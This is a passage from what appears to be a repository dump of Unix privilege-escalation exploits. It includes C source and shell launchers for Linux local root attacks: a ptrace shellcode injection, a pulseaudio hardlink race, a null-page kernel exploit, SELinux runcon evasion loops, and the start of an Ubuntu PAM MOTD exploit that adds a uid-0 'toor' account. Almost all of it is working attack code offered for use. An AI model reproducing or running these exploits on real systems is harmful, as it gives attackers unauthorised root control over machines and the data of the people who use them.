echo -e "\nYour terminal is most probably screwed now, sorry for that..." 98 | exit 99 | fi 100 | 101 | echo "The system is not vulnerable, sorry :(" 102 | 103 | # milw0rm.com [2009-04-08] 104 | -------------------------------------------------------------------------------- /2009/CVE-2009-1527.c: -------------------------------------------------------------------------------- 1 | /* 2 | ptrace_attach privilege escalation exploit by s0m3b0dy 3 | 4 | [*] tested on Gentoo 2.6.29rc1 5 | 6 | grataz: 7 | Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... 8 | 9 | email: s0m3b0dy1 (at) gmail.com 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | char shellcode[] = 28 | "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" 29 | "\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" 30 | "\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" 31 | "echo \"#include \nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;"; 32 | struct user_regs_struct322 { 33 | unsigned long ebx, ecx, edx, esi, edi, ebp, eax; 34 | unsigned short ds, __ds, es, __es; 35 | unsigned short fs, __fs, gs, __gs; 36 | unsigned long orig_eax, eip; 37 | unsigned short cs, __cs; 38 | unsigned long eflags, esp; 39 | unsigned short ss, __ss; 40 | }; 41 | 42 | main() 43 | { 44 | struct user_regs_struct322 regs; 45 | struct stat buf; 46 | int i,o; 47 | unsigned long * src; 48 | unsigned long * dst; 49 | char *env[2]; 50 | env[0]="/usr/bin/gpasswd"; // some suid file 51 | env[1]=0; 52 | if((o=fork()) == 0) 53 | { 54 | execve(env[0],env,0); 55 | exit(0); 56 | } 57 | if(ptrace(PTRACE_ATTACH,o,0,0)==-1) 58 | { 59 | printf("\n[-] Attach\n"); 60 | 
exit(0); 61 | } 62 | wait((int *)0); 63 | if (ptrace(PTRACE_GETREGS, o, NULL, ®s) == -1){ 64 | printf("\n[-] read registers\n"); 65 | exit(0); 66 | } 67 | printf( "[+] EIP - 0x%08lx\n", regs.eip); 68 | dst= (unsigned long *) regs.eip; 69 | src = (unsigned long *) shellcode; 70 | for(i=0;i 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "config.h" 9 | 10 | int main (int argc, char **argv) { 11 | 12 | int x=0,status,w,pid,y=0; 13 | char linkfn[1024],linkfndeleted[1024],fnshell[1024]; 14 | struct stat ft; 15 | 16 | snprintf(linkfn,sizeof(linkfn),"%s/p",PATH); 17 | snprintf(linkfndeleted,sizeof(linkfndeleted),"%s/p (deleted)",PATH); 18 | snprintf(fnshell,sizeof(fnshell),"%s/shell",PATH); 19 | 20 | if (stat(PATHSHELL,&ft)==0) { 21 | 22 | if (ft.st_uid == 0) { 23 | printf("Try: %s /bin/sh\n",PATHSHELL); 24 | return 0; 25 | } 26 | 27 | } 28 | 29 | if (stat(VULNBIN,&ft)!=0) { 30 | printf("%s not found.\n",VULNBIN); 31 | return 0; 32 | } 33 | 34 | if (!(ft.st_mode & S_ISUID)) { 35 | printf("%s is not suid.\n",VULNBIN); 36 | return 0; 37 | } 38 | if (stat(fnshell,&ft)!=0) { 39 | printf("%s not found.\n",fnshell); 40 | return 0; 41 | } 42 | printf("Please wait.\n"); 43 | for (y=0; y < 5000; y++) { 44 | 45 | unlink(linkfn); 46 | unlink(linkfndeleted); 47 | 48 | if (link(VULNBIN,linkfn)!=0) { 49 | perror("link"); 50 | return -1; 51 | } 52 | 53 | if (link(fnshell,linkfndeleted)!=0) { 54 | perror("link"); 55 | return -1; 56 | } 57 | 58 | pid = fork(); 59 | 60 | if (pid == -1) { 61 | perror("fork"); 62 | return -1; 63 | } else if (pid == 0) { 64 | // exec 65 | { 66 | char *args[]={"p",NULL}; 67 | //char *envp[]={"LD_BIND_NOW=1",NULL}; 68 | char *envp[]={NULL}; 69 | close(2); 70 | execve(linkfn,args,envp); 71 | } 72 | return 0; 73 | 74 | } else { 75 | if (unlink(linkfn)!=0) { 76 | perror("unlink:::"); 77 | return -1; 78 | } 79 | 80 | if (link(fnshell,linkfn)!=0) { 81 | perror("link"); 82 | return 1; 83 | } 84 | for (;;) { 85 | 86 | w = 
waitpid(pid, &status,WNOHANG); 87 | 88 | if (w == 0) { 89 | if (x > 1) { 90 | kill(pid,9); 91 | x=0; 92 | } 93 | usleep(5000); 94 | x++; 95 | continue; 96 | } 97 | 98 | if (w == -1) { 99 | perror("waitpid"); 100 | break; 101 | } 102 | 103 | break; 104 | 105 | } 106 | 107 | if (stat(PATHSHELL,&ft)==0) { 108 | 109 | if ((ft.st_uid == 0) && (ft.st_mode & S_ISUID)) { 110 | printf("Try: %s /bin/sh\n",PATHSHELL); 111 | unlink(linkfn); 112 | unlink(linkfndeleted); 113 | return 0; 114 | } 115 | } 116 | 117 | } 118 | 119 | } 120 | 121 | printf("finished 5000 attempts without success. maybe not vulnerable?\n"); 122 | 123 | unlink(linkfn); 124 | unlink(linkfndeleted); 125 | 126 | return 0; 127 | } 128 | -------------------------------------------------------------------------------- /2009/CVE-2009-1894/pulseaudio-exp/shell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "config.h" 7 | 8 | int main (int argc, char **argv) { 9 | 10 | char fnshell[1024]; 11 | 12 | if (geteuid() ==0) { 13 | 14 | if (setuid(0)!=0) { 15 | printf("setuid failed\n"); 16 | return 0; 17 | } 18 | if (setgid(0)!=0) { 19 | printf("setgid failed\n"); 20 | return 0; 21 | } 22 | 23 | if (argc > 1) { 24 | system(argv[1]); 25 | return 0; 26 | } 27 | 28 | if (access(PATHSHELL,R_OK|X_OK)!=0) { 29 | 30 | snprintf(fnshell,sizeof(fnshell),"%s/shell",PATH); 31 | 32 | printf("[*] Seems we are uid = %d and gid = %d\n",getuid(),getgid()); 33 | printf("[*] mv %s %s\n",fnshell,PATHSHELL); 34 | if (rename(fnshell, PATHSHELL)!=0) 35 | perror("rename"); 36 | printf("[*] chown root.root %s\n",PATHSHELL); 37 | if (chown(PATHSHELL,0,0)!=0) 38 | perror("chown"); 39 | printf("[*] chmod 4755 %s\n",PATHSHELL); 40 | if (chmod(PATHSHELL,04755)!=0) 41 | perror("chmod"); 42 | } 43 | 44 | } 45 | 46 | return 0; 47 | } 48 | -------------------------------------------------------------------------------- 
/2009/CVE-2009-2698/CVE-2009-2698.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** 3 | ** 0x82-CVE-2009-2698 4 | ** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit 5 | ** 6 | ** Tested White Box 4(2.6.9-5.ELsmp), 7 | ** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp), 8 | ** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5), 9 | ** Fedora Core 6(2.6.18-1.2798.fc6). 10 | ** 11 | ** -- 12 | ** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team. 13 | ** Thankful to them. 14 | ** 15 | ** -- 16 | ** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698 17 | ** sh-3.1# id 18 | ** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t 19 | ** sh-3.1# 20 | ** -- 21 | ** exploit by . 22 | ** 23 | */ 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | unsigned int uid, gid; 34 | void get_root_uid(unsigned *task) 35 | { 36 | unsigned *addr=task; 37 | while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){ 38 | addr++; 39 | } 40 | addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */ 41 | addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */ 42 | return; 43 | } 44 | void exploit(); 45 | void kernel_code() 46 | { 47 | asm("exploit:\n" 48 | "push %eax\n" 49 | "movl $0xfffff000,%eax\n" 50 | "andl %esp,%eax\n" 51 | "pushl (%eax)\n" 52 | "call get_root_uid\n" 53 | "addl $4,%esp\n" 54 | "popl %eax\n"); 55 | return; 56 | } 57 | void *kernel=kernel_code; 58 | 59 | int main(int argc, char **argv) 60 | { 61 | int fd=0; 62 | char buf[1024]; 63 | struct sockaddr x0x; 64 | void *zero_page; 65 | 66 | uid=getuid(); 67 | gid=getgid(); 68 | if(uid==0){ 69 | fprintf(stderr,"[-] check ur uid\n"); 70 | return -1; 71 | } 72 | if(personality(0xffffffff)==PER_SVR4){ 73 | if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){ 74 | perror("[-] mprotect()"); 75 
| return -1; 76 | } 77 | } 78 | else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){ 79 | perror("[-] mmap()"); 80 | return -1; 81 | } 82 | *(unsigned long *)0x0=0x90909090; 83 | *(char *)0x00000004=0x90; /* +1 */ 84 | *(char *)0x00000005=0xff; 85 | *(char *)0x00000006=0x25; 86 | *(unsigned long *)0x00000007=(unsigned long)&kernel; 87 | *(char *)0x0000000b=0xc3; 88 | 89 | if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){ 90 | perror("[-] socket()"); 91 | return -1; 92 | } 93 | x0x.sa_family=AF_UNSPEC; 94 | memset(x0x.sa_data,0x82,14); 95 | memset((char *)buf,0,sizeof(buf)); 96 | sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x)); 97 | sendto(fd,buf,1024,0,&x0x,sizeof(x0x)); 98 | if(getuid()==uid){ 99 | printf("[-] exploit failed, try again\n"); 100 | return -1; 101 | } 102 | close(fd); 103 | execl("/bin/sh","sh","-i",NULL); 104 | return 0; 105 | } 106 | 107 | /* eoc */ 108 | 109 | // milw0rm.com [2009-08-31] 110 | -------------------------------------------------------------------------------- /2009/CVE-2009-2698/therebel/pwnkernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PULSEAUDIO_PATH "/usr/bin/pulseaudio" 8 | #define PATH_TO_EXPLOIT "/home/spender/therebel/therebel/exploit.so" 9 | 10 | int main(void) 11 | { 12 | int ret; 13 | struct stat fstat; 14 | 15 | ret = personality(PER_SVR4); 16 | 17 | if (ret == -1) { 18 | fprintf(stderr, "Unable to set personality!\n"); 19 | return 0; 20 | } 21 | 22 | fprintf(stdout, " [+] Personality set to: PER_SVR4\n"); 23 | 24 | if (stat(PULSEAUDIO_PATH, &fstat)) { 25 | fprintf(stderr, "Pulseaudio does not exist!\n"); 26 | return 0; 27 | } 28 | 29 | if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) { 30 | fprintf(stderr, "Pulseaudio is not suid root!\n"); 31 | return 0; 32 | } 33 | 34 | execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, 
"--log-level=0", "-L", PATH_TO_EXPLOIT, NULL); 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /2009/CVE-2009-2698/therebel/therebel.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'` 4 | sed "s/\/home\/spender/$ESCAPED_PWD/g" pwnkernel.c > pwnkernel1.c 5 | mv pwnkernel.c pwnkernel2.c 6 | mv pwnkernel1.c pwnkernel.c 7 | killall -9 pulseaudio 2> /dev/null 8 | IS_64=`uname -m` 9 | OPT_FLAG="" 10 | if [ "$IS_64" = "x86_64" ]; then 11 | OPT_FLAG="-m64" 12 | fi 13 | MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null` 14 | if [ "$MINADDR" = "" -o "$MINADDR" = "0" ]; then 15 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 2> /dev/null 16 | if [ "$?" = "1" ]; then 17 | cc $OPT_FLAG -o exploit exploit.c 2> /dev/null 18 | fi 19 | ./exploit 20 | elif [ ! -f '/selinux/enforce' ]; then 21 | cc -fno-stack-protector -fPIC $OPT_FLAG -shared -o exploit.so exploit.c 2> /dev/null 22 | if [ "$?" = "1" ]; then 23 | cc -fPIC $OPT_FLAG -shared -o exploit exploit.c 2> /dev/null 24 | fi 25 | cc $OPT_FLAG -o pwnkernel pwnkernel.c 26 | ./pwnkernel 27 | else 28 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 2> /dev/null 29 | if [ "$?" = "1" ]; then 30 | cc $OPT_FLAG -o exploit exploit.c 2> /dev/null 31 | fi 32 | ./exploit 33 | if [ "$?" = "1" ]; then 34 | runcon -t initrc_t ./exploit 35 | if [ "$?" = "1" ]; then 36 | runcon -t wine_t ./exploit 37 | if [ "$?" = "1" ]; then 38 | runcon -t vbetool_t ./exploit 39 | if [ "$?" = "1" ]; then 40 | runcon -t unconfined_mono_t ./exploit 41 | if [ "$?" 
= "1" ]; then 42 | runcon -t samba_unconfined_net_t ./exploit 43 | fi 44 | fi 45 | fi 46 | fi 47 | fi 48 | fi 49 | mv -f pwnkernel2.c pwnkernel.c 50 | -------------------------------------------------------------------------------- /2009/iskorpitx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/iskorpitx -------------------------------------------------------------------------------- /2009/linux-sendpage3/exploit-pulseaudio.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int 7 | main(int argc, char **argv) 8 | { 9 | if (argc < 2) 10 | exit(EXIT_FAILURE); 11 | 12 | if (personality(PER_SVR4) == -1) { 13 | perror("personality"); 14 | exit(EXIT_FAILURE); 15 | } 16 | 17 | execl("/usr/bin/pulseaudio", "pulseaudio", 18 | "--log-level=0", "-L", argv[1], NULL); 19 | 20 | exit(EXIT_SUCCESS); 21 | } 22 | -------------------------------------------------------------------------------- /2009/linux-sendpage3/run: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | EXPLOIT=./exploit 4 | EXPLOIT_PULSEAUDIO=./exploit-pulseaudio 5 | GCC=/usr/bin/gcc 6 | 7 | if [ -x $GCC ]; then 8 | if [ -x $EXPLOIT ]; then 9 | rm -f $EXPLOIT 10 | fi 11 | 12 | if [ -x $EXPLOIT_PULSEAUDIO ]; then 13 | rm -f $EXPLOIT_PULSEAUDIO 14 | fi 15 | 16 | if [ -x $EXPLOIT.so ]; then 17 | rm -f $EXPLOIT.so 18 | fi 19 | 20 | MACHINE=$(uname -m) 21 | 22 | if [ "$MACHINE" = "x86_64" -o "$MACHINE" = "ppc64" ]; then 23 | $GCC -Wall -m64 -o $EXPLOIT $EXPLOIT.c 24 | $GCC -Wall -m64 -o $EXPLOIT_PULSEAUDIO $EXPLOIT_PULSEAUDIO.c 25 | $GCC -Wall -fPIC -m64 -shared -o $EXPLOIT.so $EXPLOIT.c 26 | else 27 | $GCC -Wall -o $EXPLOIT $EXPLOIT.c 28 | $GCC -Wall -o $EXPLOIT_PULSEAUDIO $EXPLOIT_PULSEAUDIO.c 29 | $GCC 
-Wall -fPIC -shared -o $EXPLOIT.so $EXPLOIT.c 30 | fi 31 | 32 | if [ -x $EXPLOIT ]; then 33 | $EXPLOIT 34 | 35 | if [ $? -eq 0 ]; then 36 | exit 37 | fi 38 | 39 | source ./runcon-mmap_zero 40 | fi 41 | 42 | if [ -x $EXPLOIT_PULSEAUDIO ]; then 43 | if [ -e $EXPLOIT.so ]; then 44 | PULSEAUDIO=/usr/bin/pulseaudio 45 | 46 | if [ -x $PULSEAUDIO ]; then 47 | $PULSEAUDIO -k &> /dev/null 48 | $PULSEAUDIO --check &> /dev/null 49 | 50 | if [ $? -eq 0 ]; then 51 | kill -9 $(pidof pulseaudio) 52 | fi 53 | 54 | $EXPLOIT_PULSEAUDIO $PWD/$EXPLOIT 55 | fi 56 | fi 57 | fi 58 | fi 59 | -------------------------------------------------------------------------------- /2009/linux-sendpage3/runcon-mmap_zero: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | EXPLOIT=./exploit 4 | RUNCON=/usr/bin/runcon 5 | 6 | if [ -x $EXPLOIT ]; then 7 | if [ -x $RUNCON ]; then 8 | SELINUX_ENFORCE=/selinux/enforce 9 | 10 | if [ -f $SELINUX_ENFORCE ]; then 11 | ENFORCE=$(cat $SELINUX_ENFORCE) 12 | fi 13 | 14 | GETENFORCE=/usr/sbin/getenforce 15 | 16 | if [ -x $GETENFORCE ]; then 17 | ENFORCE=$($GETENFORCE) 18 | fi 19 | 20 | if [ "$ENFORCE" = "1" -o "$ENFORCE" = "Enforcing" ]; then 21 | source ./sesearch-mmap_zero 22 | 23 | for TYPE in $(cat unconfined_t_trans_mmap_zero.txt); do 24 | $RUNCON -t $TYPE -- $EXPLOIT 25 | 26 | if [ $? -eq 0 ]; then 27 | exit 28 | fi 29 | done 30 | 31 | for TYPE in $(cat initrc_t_trans_mmap_zero.txt); do 32 | $RUNCON -t initrc_t -- $RUNCON -t $TYPE -- $EXPLOIT 33 | 34 | if [ $? -eq 0 ]; then 35 | exit 36 | fi 37 | done 38 | 39 | $RUNCON -t initrc_t -r system_r -- $EXPLOIT 40 | 41 | CHCON=/usr/bin/chcon 42 | 43 | if [ -x $CHCON ]; then 44 | $CHCON -t initrc_exec_t $EXPLOIT 45 | 46 | for TYPE in $(cat initrc_t_trans_mmap_zero.txt); do 47 | $RUNCON -t initrc_t -r system_r \ 48 | -- $RUNCON -t $TYPE -- $EXPLOIT 49 | 50 | if [ $? 
-eq 0 ]; then 51 | exit 52 | fi 53 | done 54 | fi 55 | fi 56 | fi 57 | fi 58 | -------------------------------------------------------------------------------- /2009/linux-sendpage3/sesearch-mmap_zero: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | SESEARCH=/usr/bin/sesearch 4 | AWK=/usr/bin/awk 5 | UNIQ=/usr/bin/uniq 6 | 7 | if [ -x $SESEARCH ]; then 8 | $SESEARCH -p mmap_zero --allow \ 9 | | $AWK '{ printf "%s\n", $2 }' | grep '_t' | sort | $UNIQ \ 10 | > mmap_zero.txt 11 | 12 | $SESEARCH -s unconfined_t -c process -p transition --allow \ 13 | | $AWK '{ printf "%s\n", $3 }' | grep '_t' | sort | $UNIQ \ 14 | > unconfined_t_trans.txt 15 | 16 | $SESEARCH -s initrc_t -c process -p transition --allow \ 17 | | $AWK '{ printf "%s\n", $3 }' | grep '_t' | sort | $UNIQ \ 18 | > initrc_t_trans.txt 19 | 20 | if [ -f unconfined_t_trans_mmap_zero.txt ]; then 21 | rm -f unconfined_t_trans_mmap_zero.txt 22 | fi 23 | 24 | touch unconfined_t_trans_mmap_zero.txt 25 | 26 | for TYPE in $(cat mmap_zero.txt); do 27 | grep $TYPE unconfined_t_trans.txt >> unconfined_t_trans_mmap_zero.txt 28 | done 29 | 30 | if [ -f initrc_t_trans_mmap_zero.txt ]; then 31 | rm -f initrc_t_trans_mmap_zero.txt 32 | fi 33 | 34 | touch initrc_t_trans_mmap_zero.txt 35 | 36 | for TYPE in $(cat mmap_zero.txt); do 37 | grep $TYPE initrc_t_trans.txt >> initrc_t_trans_mmap_zero.txt 38 | done 39 | fi 40 | -------------------------------------------------------------------------------- /2009/r00t: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/r00t -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/exploit.so: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/wunderbar_emporium2/exploit.so -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/pwnkernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/wunderbar_emporium2/pwnkernel -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/pwnkernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PULSEAUDIO_PATH "/usr/bin/pulseaudio" 8 | #define PATH_TO_EXPLOIT "/home/spender/exploit.so" 9 | 10 | int main(void) 11 | { 12 | int ret; 13 | struct stat fstat; 14 | 15 | ret = personality(PER_SVR4); 16 | 17 | if (ret == -1) { 18 | fprintf(stderr, "Unable to set personality!\n"); 19 | return 0; 20 | } 21 | 22 | fprintf(stdout, " [+] Personality set to: PER_SVR4\n"); 23 | 24 | if (stat(PULSEAUDIO_PATH, &fstat)) { 25 | fprintf(stderr, "Pulseaudio does not exist!\n"); 26 | return 0; 27 | } 28 | 29 | if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) { 30 | fprintf(stderr, "Pulseaudio is not suid root!\n"); 31 | return 0; 32 | } 33 | 34 | execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL); 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /2009/wunderbar_emporium2/wunderbar_emporium.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'` 4 | sed "s/\/home\/spender/$ESCAPED_PWD/g" pwnkernel.c > pwnkernel1.c 5 | mv pwnkernel.c pwnkernel2.c 6 | mv pwnkernel1.c pwnkernel.c 7 | killall -9 pulseaudio 
2> /dev/null 8 | IS_64=`uname -p` 9 | OPT_FLAG="" 10 | if [ "$IS_64" = "x86_64" ]; then 11 | OPT_FLAG="-m64" 12 | fi 13 | MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null` 14 | if [ "$MINADDR" = "" -o "$MINADDR" = "0" ]; then 15 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 2> /dev/null 16 | if [ "$?" = "1" ]; then 17 | cc $OPT_FLAG -o exploit exploit.c 18 | fi 19 | cat tzameti.avi >> ./exploit 20 | ./exploit 21 | elif [ ! -f '/selinux/enforce' ]; then 22 | cc -fno-stack-protector -fPIC $OPT_FLAG -shared -o exploit.so exploit.c 23 | cc $OPT_FLAG -o pwnkernel pwnkernel.c 24 | ./pwnkernel 25 | else 26 | cc -fno-stack-protector $OPT_FLAG -o exploit exploit.c 27 | cat tzameti.avi >> ./exploit 28 | ./exploit 29 | if [ "$?" = "1" ]; then 30 | runcon -t initrc_t ./exploit 31 | if [ "$?" = "1" ]; then 32 | runcon -t wine_t ./exploit 33 | if [ "$?" = "1" ]; then 34 | runcon -t vbetool_t ./exploit 35 | if [ "$?" = "1" ]; then 36 | runcon -t unconfined_mono_t ./exploit 37 | if [ "$?" 
= "1" ]; then 38 | runcon -t samba_unconfined_net_t ./exploit 39 | fi 40 | fi 41 | fi 42 | fi 43 | fi 44 | fi 45 | mv -f pwnkernel2.c pwnkernel.c 46 | -------------------------------------------------------------------------------- /2010/2.6.18 2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18 2010 -------------------------------------------------------------------------------- /2010/2.6.18-194 2010 x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18-194 2010 x86_64 -------------------------------------------------------------------------------- /2010/2.6.18/2.6.18-194.1-2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18/2.6.18-194.1-2010 -------------------------------------------------------------------------------- /2010/2.6.18/2.6.18-194.17.1.el5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.18/2.6.18-194.17.1.el5 -------------------------------------------------------------------------------- /2010/2.6.32/2.6.32-2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.32/2.6.32-2010 -------------------------------------------------------------------------------- /2010/2.6.36-rc1 and down/compile2: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.36-rc1 and down/compile2 -------------------------------------------------------------------------------- /2010/2.6.36-rc1 and down/i-CAN-haz-MODHARDEN: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.36-rc1 and down/i-CAN-haz-MODHARDEN -------------------------------------------------------------------------------- /2010/2.6.36.2 and down/2.6.36.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.36.2 and down/2.6.36.2 -------------------------------------------------------------------------------- /2010/2.6.37 and down/full-nelson: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.37 and down/full-nelson -------------------------------------------------------------------------------- /2010/2.6.xx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2.6.xx -------------------------------------------------------------------------------- /2010/2010: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/2010 
-------------------------------------------------------------------------------- /2010/CVE-2010-0832.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Exploit Title: Ubuntu PAM MOTD local root 4 | # Date: July 9, 2010 5 | # Author: Anonymous 6 | # Software Link: http://packages.ubuntu.com/ 7 | # Version: pam-1.1.0 8 | # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) 9 | # CVE: CVE-2010-0832 10 | # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i 11 | # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen 12 | # 13 | # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. 14 | # Does not prompt for login by creating temporary SSH key and authorized_keys entry. 15 | # 16 | # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh 17 | # [*] Ubuntu PAM MOTD local root 18 | # [*] Backuped /home/user/.ssh/authorized_keys 19 | # [*] SSH key set up 20 | # [*] Backuped /home/user/.cache 21 | # [*] spawn ssh 22 | # [+] owned: /etc/passwd 23 | # [*] spawn ssh 24 | # [+] owned: /etc/shadow 25 | # [*] Restored /home/user/.cache 26 | # [*] Restored /home/user/.ssh/authorized_keys 27 | # [*] SSH key removed 28 | # [+] Success! 
Use password toor to get root 29 | # Password: 30 | # root@ubuntu:/home/user# id 31 | # uid=0(root) gid=0(root) groupes=0(root) 32 | # 33 | P='toor:x:0:0:root:/root:/bin/bash' 34 | S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' 35 | echo "[*] Ubuntu PAM MOTD local root" 36 | [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1 37 | [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1 38 | [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1 39 | backup() { 40 | [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak 41 | [ -e "$1" ] || return 0 42 | mv "$1"{,.bak} || return 1 43 | echo "[*] Backuped $1" 44 | } 45 | restore() { 46 | [ -e "$1" ] && rm -rf "$1" 47 | [ -e "$1".bak ] || return 0 48 | mv "$1"{.bak,} || return 1 49 | echo "[*] Restored $1" 50 | } 51 | key_create() { 52 | backup ~/.ssh/authorized_keys 53 | ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 54 | [ ! 
